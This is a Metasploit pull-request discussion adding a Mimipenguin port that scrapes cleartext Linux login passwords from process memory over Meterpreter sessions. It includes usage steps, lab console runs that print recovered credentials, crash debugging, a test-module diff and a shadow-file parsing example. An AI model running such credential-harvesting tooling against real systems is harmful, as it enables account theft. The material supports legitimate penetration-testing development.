Add Mimipenguin #16688

Merged
merged 27 commits into from
Sep 19, 2022

space-r7
Contributor

Description

This adds a port of Mimipenguin to Metasploit. Relying on mem_search() and mem_read() (rapid7/mettle#232), this searches the memory regions of various processes for needles that are found near passwords in cleartext. Using the locations for all of the needles found, this will search the nearby regions for possible passwords.

Verification

  • Get a meterpreter session on a Linux-based target (with root privileges)
  • Do: use post/linux/gather/mimipenguin
  • Do: set session <sess_no>
  • Do: run
  • You should get credentials for the vulnerable services installed

Scenarios

msf6 post(linux/gather/mimipenguin) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Checking for matches in process gnome-keyring-daemon
[*] Checking for matches in process gdm-password
[*] Checking for matches in process vsftpd
[*] Checking for matches in process sshd
[*] Checking for matches in process lightdm
[+] Found valid password 'password' for user 'space' in process 'gnome-keyring-daemon'!
[+] Found valid password 'liEZNNV3Rt' for user 'admin' in process 'gnome-keyring-daemon'!
[+] Found 2 valid credential(s)!
[*] Post module execution completed
msf6 post(linux/gather/mimipenguin) > sessions -i -1
[*] Starting interaction with 8...

meterpreter > sysinfo
Computer     : 192.168.140.169
OS           : Ubuntu 21.04 (Linux 5.11.0-49-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Notes

  • Requires Mettle PR #232 to land first
  • Passwords can still be found in cleartext on the latest versions of Ubuntu, Debian, etc., but they use yescrypt as the default hashing algorithm, which I haven't found support for in the gems that we use. Because of this, the module fails although it might still find the password in memory
  • To retrieve a password in gnome-keyring-daemon, logging in through the GUI is required. For vsftpd, an active / logged in FTP session is required. ssh isn't very consistent, but it requires an active ssh session that has elevated privileges using sudo. I haven't been able to figure out what's needed beyond that yet.

modules/post/linux/gather/mimipenguin.rb
pass_type = pass_info['type']
case pass_type
when 'md5'
hashed = UnixCrypt::MD5.build(str, salt)
Contributor

UnixCrypt hashing is performed on the Metasploit side, which may not be running on Linux. I'm not sure if it is relevant to this PR, but last time I attempted this (#10224) there were issues with OS-dependent crypt implementations. See: #10224 (comment)

I worked around this by performing hashing on the target host. This also had the added benefit of removing the requirement to send huge amounts of process memory data back to Metasploit for processing. However, the implementation was unclean.

Contributor Author

I was originally using crypt() and ran into this problem as well. UnixCrypt was suggested as a replacement and has worked for everything except for yescrypt (lacking support). Might have to attempt testing unsupported hashes on the target though, thanks.

@bwatters-r7 bwatters-r7 self-assigned this Jun 22, 2022
space-r7 and others added 22 commits July 1, 2022 12:56
Co-authored-by: bcoles <bcoles@gmail.com>
includes using python on target for yescrypt
support, not failing on unsupported hash types,
documentation updates, etc
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
…em/memory.rb

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
@bwatters-r7
Contributor

I'm having some trouble pulling creds on Ubuntu VMs.....

msf6 post(linux/gather/mimipenguin) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information              Connection
  --  ----  ----                   -----------              ----------
  3         meterpreter x64/linux  root @ ubuntu16.04.1x64  10.5.135.101:4567 -> 10.5.132.110:60788 (10.5.132.110)
  5         meterpreter x64/linux  root @ 10.5.134.100      10.5.135.101:4567 -> 10.5.134.100:47250 (10.5.134.100)
  6         meterpreter x64/linux  root @ 10.5.132.108      10.5.135.101:4567 -> 10.5.132.108:37184 (10.5.132.108)

msf6 post(linux/gather/mimipenguin) > sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 3 (10.5.132.110)
Computer     : ubuntu16.04.1x64
OS           : Ubuntu 16.04 (Linux 4.4.0-31-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
[*] Running 'sysinfo' on meterpreter session 5 (10.5.134.100)
Computer     : 10.5.134.100
OS           : Ubuntu 20.04 (Linux 5.13.0-37-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
[*] Running 'sysinfo' on meterpreter session 6 (10.5.132.108)
Computer     : 10.5.132.108
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
msf6 post(linux/gather/mimipenguin) > set session 3
session => 3
msf6 post(linux/gather/mimipenguin) > run

[*] Storing shadow file...
[*] Checking for matches in process gnome-keyring-daemon
[*] Searching PID 4280...
[*] Choosing memory regions to search
[*] Checking for matches in process gdm-password
[*] Choosing memory regions to search
[*] Checking for matches in process vsftpd
[*] Choosing memory regions to search
[*] Checking for matches in process sshd
[*] Choosing memory regions to search
[*] Checking for matches in process lightdm
[*] Searching PID 3549...
[*] Searching PID 4021...
[*] Choosing memory regions to search
[-] Post aborted due to failure: not-found: Failed to find any passwords
[*] Post module execution completed
msf6 post(linux/gather/mimipenguin) > set session 5
session => 5
msf6 post(linux/gather/mimipenguin) > run

[*] Storing shadow file...
[*] Checking for matches in process gnome-keyring-daemon
[*] Searching PID 1790...
[*] Choosing memory regions to search
[*] Checking for matches in process gdm-password
[*] Choosing memory regions to search
[*] Checking for matches in process vsftpd
[*] Choosing memory regions to search
[*] Checking for matches in process sshd
[*] Searching PID 11691...
[*] Searching PID 11774...
[*] Searching PID 11855...
[*] Choosing memory regions to search
[*] Checking for matches in process lightdm
[*] Choosing memory regions to search
[-] Post aborted due to failure: not-found: Failed to find any passwords
[*] Post module execution completed
msf6 post(linux/gather/mimipenguin) > set session 6
session => 6
msf6 post(linux/gather/mimipenguin) > run

[*] Storing shadow file...
[*] Checking for matches in process gnome-keyring-daemon
[*] Searching PID 1391...
[*] Choosing memory regions to search
[*] Checking for matches in process gdm-password
[*] Choosing memory regions to search
[*] Checking for matches in process vsftpd
[*] Choosing memory regions to search
[*] Checking for matches in process sshd
[*] Choosing memory regions to search
[*] Checking for matches in process lightdm
[*] Choosing memory regions to search
[-] Post aborted due to failure: not-found: Failed to find any passwords
[*] Post module execution completed
msf6 post(linux/gather/mimipenguin) > 

All these were logged into recently and one is running openssh-server with an active connection. Am I missing something? I'd expected the gnome-keyring-daemon to be vulnerable. Is there a setting I need to adjust?

@space-r7
Contributor Author

The hash types weren't being matched properly, so I think that's why you weren't getting any results. Sorry about that! Submitted a fix and ran some tests:

Ubuntu 18.04.1
msf6 post(linux/gather/mimipenguin) > rerun
[*] Reloading module...

[*] Checking for matches in process gnome-keyring-daemon
[*] Checking for matches in process gdm-password
[*] Checking for matches in process vsftpd
[*] Checking for matches in process sshd
[*] Checking for matches in process lightdm
[+] Found 1 valid credential(s)!

Credentials
===========

  Process Name          Username  Password
  ------------          --------  --------
  gnome-keyring-daemon  msfuser   v3Mpassword

[*] Credentials stored in /Users/space/.msf4/loot/20220829174930_default_192.168.140.141_mimipenguin.csv_645166.txt
[*] Post module execution completed
Ubuntu 16.04.1 x64
meterpreter > sysinfo
Computer     : 192.168.140.139
OS           : Ubuntu 16.04 (Linux 4.4.0-31-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > previous
msf6 post(linux/gather/mimipenguin) > set session 2
session => 2
msf6 post(linux/gather/mimipenguin) > run

[*] Checking for matches in process gnome-keyring-daemon
[*] Checking for matches in process gdm-password
[*] Checking for matches in process vsftpd
[*] Checking for matches in process sshd
[*] Checking for matches in process lightdm
[+] Found 1 valid credential(s)!

Credentials
===========

  Process Name  Username     Password
  ------------  --------     --------
  lightdm       penguintest  P3nguinP@ssword

[*] Credentials stored in /Users/space/.msf4/loot/20220829180307_default_192.168.140.139_mimipenguin.csv_776092.txt
[*] Post module execution completed
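
The hash-type matching this thread keeps returning to (the `md5` case under review, the yescrypt gap, and the fix for types not being matched), as an added Ruby example that is not part of the PR or the module: it parses shadow-style lines, including locked accounts and the optional `rounds=` and yescrypt parameter fields, and sorts accounts by whether the scheme can be computed by the controller-side library. `ShadowEntry`, `SCHEMES`, `LOCAL`, `parse_shadow_line`, `partition_by_support` and the sample lines are constructed for illustration; treating md5, sha256 and sha512 as the locally supported set is an assumption based only on the thread saying yescrypt is not supported.

```ruby
# Added illustration; not code from the PR. All names here are hypothetical.

# crypt(3) scheme identifiers, i.e. the text between the first two '$'.
SCHEMES = { '1' => 'md5', '5' => 'sha256', '6' => 'sha512', 'y' => 'yescrypt' }.freeze

# Assumption: schemes the controller-side hashing library can compute.
LOCAL = %w[md5 sha256 sha512].freeze

ShadowEntry = Struct.new(:user, :scheme, :params, :salt, :state)

# Parse one shadow-style line into a ShadowEntry, or nil if it is malformed.
def parse_shadow_line(line)
  user, field = line.chomp.split(':', 3)
  return nil if user.nil? || user.empty? || field.nil?
  return ShadowEntry.new(user, nil, nil, nil, :no_password) if field.empty?

  locked = field.start_with?('!')        # '!' prefix marks a locked account
  body = field.sub(/\A!+/, '')
  unless body.start_with?('$')
    no_hash = body.empty? || body == '*' # '!' or '*' alone: no usable hash
    return ShadowEntry.new(user, no_hash ? nil : 'des', nil, nil,
                           (locked || no_hash) ? :locked : :active)
  end

  parts = body.split('$')                # "$6$salt$hash" -> ["", "6", "salt", "hash"]
  scheme = SCHEMES.fetch(parts[1], 'unknown')
  rest = parts[2..-1] || []
  params = nil
  if %w[sha256 sha512].include?(scheme) && rest.first.to_s.start_with?('rounds=')
    params = rest.shift                  # optional "rounds=N" sits before the salt
  elsif scheme == 'yescrypt'
    params = rest.shift                  # yescrypt always has a parameter field
  end
  ShadowEntry.new(user, scheme, params, rest.first, locked ? :locked : :active)
end

# Sort accounts into buckets instead of failing on the first unsupported type.
def partition_by_support(lines)
  result = { local: [], unsupported_locally: [], skipped: [] }
  lines.each do |line|
    entry = parse_shadow_line(line)
    next if entry.nil?

    if entry.state != :active || entry.scheme.nil?
      result[:skipped] << entry.user
    elsif LOCAL.include?(entry.scheme)
      result[:local] << entry.user
    else
      result[:unsupported_locally] << entry.user
    end
  end
  result
end

# Constructed sample lines; the salts and hashes are placeholders, not real values.
SAMPLE = [
  'root:!:19000:0:99999:7:::',
  'daemon:*:19000:0:99999:7:::',
  'alice:$1$CONSTRUCT$placeholderhash:19000:0:99999:7:::',
  'bob:$6$rounds=5000$CONSTRUCTEDSALT$placeholderhash:19000:0:99999:7:::',
  'carol:$y$j9T$CONSTRUCTEDSALT$placeholderhash:19000:0:99999:7:::',
  'dave:!$6$CONSTRUCTEDSALT$placeholderhash:19000:0:99999:7:::',
  'erin::19000:0:99999:7:::'
].freeze

if __FILE__ == $PROGRAM_NAME
  partition_by_support(SAMPLE).each { |bucket, users| puts "#{bucket}: #{users.join(', ')}" }
end
```

The same classification doubles as a quick audit of which accounts on a host still use md5crypt.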

@bwatters-r7
Contributor

Ohhh..... I have managed to get a reproducible crash across 2 systems. It is a little early, but both systems are running XFCE as the graphical environment, and both fail the same way:

msf6 post(linux/gather/mimipenguin) > sessions -i 11
[*] Starting interaction with 11...

meterpreter > sysinfo
Computer     : 10.5.134.167
OS           : Ubuntu 22.04 (Linux 5.15.0-46-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > background
[*] Backgrounding session 11...
msf6 post(linux/gather/mimipenguin) > run

[*] Storing shadow file...
[*] Checking for matches in process gnome-keyring-daemon
[*] Searching PID 1005...
[*] Choosing memory regions to search
[*] Checking for matches in process gdm-password
[*] Choosing memory regions to search
[*] Checking for matches in process vsftpd
[*] Choosing memory regions to search
[*] Checking for matches in process sshd
[*] Choosing memory regions to search
[*] Checking for matches in process lightdm
[*] Searching PID 720...
[*] Searching PID 969...
[*] Choosing memory regions to search
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: 1
[-] Call stack:
[-]   /home/tmoose/rapid7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:176:in `execute'
[-]   /home/tmoose/rapid7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:199:in `capture_output'
[-]   /home/tmoose/rapid7/metasploit-framework/lib/msf/core/post/common.rb:119:in `cmd_exec'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:280:in `block (2 levels) in check_for_valid_passwords'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:254:in `each'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:254:in `block in check_for_valid_passwords'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:253:in `each'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:253:in `check_for_valid_passwords'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:363:in `block (2 levels) in run'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:354:in `each'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:354:in `block in run'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:342:in `each'
[-]   /home/tmoose/rapid7/metasploit-framework/modules/post/linux/gather/mimipenguin.rb:342:in `run'
[*] Post module execution completed
msf6 post(linux/gather/mimipenguin) > sessions -i 11
[*] Starting interaction with 11...

meterpreter > sysinfo
Computer     : 10.5.134.167
OS           : Ubuntu 22.04 (Linux 5.15.0-46-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > shell
[-] stdapi_sys_process_execute: Operation failed: 1

It looks like the cmd_exec call is crashing, and not coming back, but the session remains. I can run anything that has a direct link to the system calls, but nothing that needs the execute command?

meterpreter > shell
[-] stdapi_sys_process_execute: Operation failed: 1
meterpreter > ls -l
Listing: /home/msfuser
======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  0     fil   2022-08-30 18:37:08 -0500  .ICEauthority
100600/rw-------  57    fil   2022-08-30 18:37:07 -0500  .Xauthority
100644/rw-r--r--  1600  fil   2022-08-30 11:57:38 -0500  .Xdefaults
100644/rw-r--r--  220   fil   2022-08-30 11:57:38 -0500  .bash_logout
100644/rw-r--r--  3771  fil   2022-08-30 11:57:38 -0500  .bashrc
040700/rwx------  4096  dir   2022-08-30 18:37:10 -0500  .cache
040755/rwxr-xr-x  4096  dir   2022-08-30 18:37:09 -0500  .config
100644/rw-r--r--  26    fil   2022-08-30 18:37:07 -0500  .dmrc
040775/rwxrwxr-x  4096  dir   2022-08-30 18:37:08 -0500  .local
100644/rw-r--r--  807   fil   2022-08-30 11:57:38 -0500  .profile
100644/rw-r--r--  0     fil   2022-08-30 12:10:20 -0500  .sudo_as_admin_successful
100644/rw-r--r--  14    fil   2022-08-30 11:57:38 -0500  .xscreensaver
100600/rw-------  8141  fil   2022-08-30 12:07:16 -0500  .xsession-errors
040755/rwxr-xr-x  4096  dir   2022-08-30 18:37:08 -0500  Desktop
040755/rwxr-xr-x  4096  dir   2022-08-30 18:37:08 -0500  Documents
040755/rwxr-xr-x  4096  dir   2022-08-30 18:37:08 -0500  Downloads

The two systems I've seen this on are:
xubuntu
http://mirror.us.leaseweb.net/ubuntu-cdimage/xubuntu/releases/22.04/release/
mxlinux (with XFCE)
https://sourceforge.net/projects/mx-linux/files/Final/Xfce/MX-21.2_x64.iso/download

@space-r7
Contributor Author

I was able to reproduce the crash on a Xubuntu 22.04 VM via the module, and I can get a crash on both Xubuntu and Ubuntu 18.04 via a test module. When testing Mimipenguin, Xubuntu specifically is pulling more results from memory versus other versions of Linux, thus requiring more cmd_exec() calls, resulting in the crash. I modified the post/test/cmd_exec module echo test case to call cmd_exec() and print the number of calls before a crash. You'll see that on both Xubuntu and Ubuntu the number of successful calls is the same:

Test output
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Sending stage (3045348 bytes) to 192.168.140.152
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.152:56710) at 2022-08-31 13:46:16 -0500

meterpreter > sysinfo
Computer     : 192.168.140.152
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Sending stage (3045348 bytes) to 192.168.140.149
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.149:33450) at 2022-08-31 13:46:27 -0500

meterpreter > sysinfo
Computer     : 192.168.140.149
OS           : Ubuntu 22.04 (Linux 5.15.0-46-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > loadpath test/modules
Loaded 38 modules:
    14 auxiliary modules
    13 exploit modules
    11 post modules
msf6 exploit(multi/handler) > use post/test/cmd_exec
msf6 post(test/cmd_exec) > set session 1
session => 1
msf6 post(test/cmd_exec) > run

[*] Running against session 1
[*] Session type is meterpreter and platform is linux
[+] should return the result of echo
[+] should return the full response after sleeping
[+] should return the full response after sleeping
Echo #0
Echo #1
Echo #2
Echo #3
Echo #4
Echo #5
Echo #6
...
Echo #328
Echo #329
Echo #330
Echo #331
Echo #332
Echo #333
Echo #334
[-] FAILED: should return the result of echo 500 times
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the result of echo with single quotes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the result of echo with double quotes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the stderr output
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[*] Passed: 7; Failed: 0
[*] Post module execution completed
msf6 post(test/cmd_exec) > set session 2
session => 2
msf6 post(test/cmd_exec) > run

[*] Running against session 2
[*] Session type is meterpreter and platform is linux
[+] should return the result of echo
[+] should return the full response after sleeping
[+] should return the full response after sleeping
Echo #0
Echo #1
Echo #2
Echo #3
Echo #4
Echo #5
Echo #6
...
Echo #328
Echo #329
Echo #330
Echo #331
Echo #332
Echo #333
Echo #334
[-] FAILED: should return the result of echo 500 times
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the result of echo with single quotes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the result of echo with double quotes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[-] FAILED: should return the stderr output
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_sys_process_execute: Operation failed: 1
[*] Passed: 7; Failed: 0
[*] Post module execution completed
Diff of changes to cmd_exec test module
msf6 post(test/cmd_exec) > git diff test/modules/post/test/cmd_exec.rb
[*] exec: git diff test/modules/post/test/cmd_exec.rb

diff --git a/test/modules/post/test/cmd_exec.rb b/test/modules/post/test/cmd_exec.rb
index 1456f9b49b..45970b4c44 100644
--- a/test/modules/post/test/cmd_exec.rb
+++ b/test/modules/post/test/cmd_exec.rb
@@ -51,10 +51,11 @@ class MetasploitModule < Msf::Post
         output.delete("\r") == "#{test_string}\n#{test_string2}"
       end
 
-      it "should return the result of echo 10 times" do
-        10.times do
+      it "should return the result of echo 500 times" do
+        500.times do |i|
           test_string = Rex::Text.rand_text_alpha(4)
           output = cmd_exec("echo #{test_string}")
+          puts "Echo ##{i}"
           return false unless output == test_string
         end
         true
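
Review bot: the added `puts "Echo ##{i}"` inside the `500.times` block writes straight to stdout rather than through the framework's `print_status`/`vprint_status`, and the index it prints only counts calls made inside this `it` block, so the `cmd_exec` calls from the test cases above it are missing from the number read off at the failure. If this instrumentation is kept, report a running total of `cmd_exec` calls across the module, and leave the original 10-iteration case in place alongside a separate stress case so the regular test run does not depend on a 500-call loop.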

It looks to me that there is a hard limit on how many commands we can run. Any ideas for a potential workaround? I've added a small bit of code to the Mimipenguin module that filters out results that are most likely library paths.

@bwatters-r7
Contributor

I was digging into this this morning and was hoping to bring it up during module hacking. That there's a hard limit to the number of times we can call cmd_exec smells like a channel or process counter that's limited. I'm curious if anyone knows the likely location of such a thing.

@bwatters-r7
Contributor

bwatters-r7 commented Sep 1, 2022

Edit: I'm not seeing this be an issue on Windows Meterpreter. I'm guessing this might live in the Mettle code.

I guess a quick test would be to run the modified cmd_exec tests on a windows meterpreter host; it might tell us if the limit is framework-based or payload-based....

@bwatters-r7
Contributor

I'm not seeing anything useful in the debug on the target side:
image

On the framework side with the TLV output, I'm seeing a boatload of close channel requests, often for the same channels over and over again. I'm not sure if this is an indication that the channels are never closed, or if they're reopened immediately....

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-284">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=284>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-285">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=285>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-286">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=286>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-287">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=287>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-288">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=288>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-289">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=289>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-290">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=290>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-291">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=291>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-292">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=292>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-293">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=293>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-294">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=294>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-295">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=295>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-296">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=296>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-297">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=297>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-298">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=298>
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="\x81C\x17\xB8Lp\x84\x95j\xEBl\xE9\t\xFB\xA9\xD5">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1 command=core_channel_close>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="channel-req-299">
  #<Rex::Post::Meterpreter::Tlv type=CHANNEL_ID      meta=INT        value=299>
]>

[*] 10.5.134.167 - Meterpreter session 6 closed.  Reason: Died

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=23 command=core_shutdown>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="91188205856850961535503134677805">

@adfoster-r7

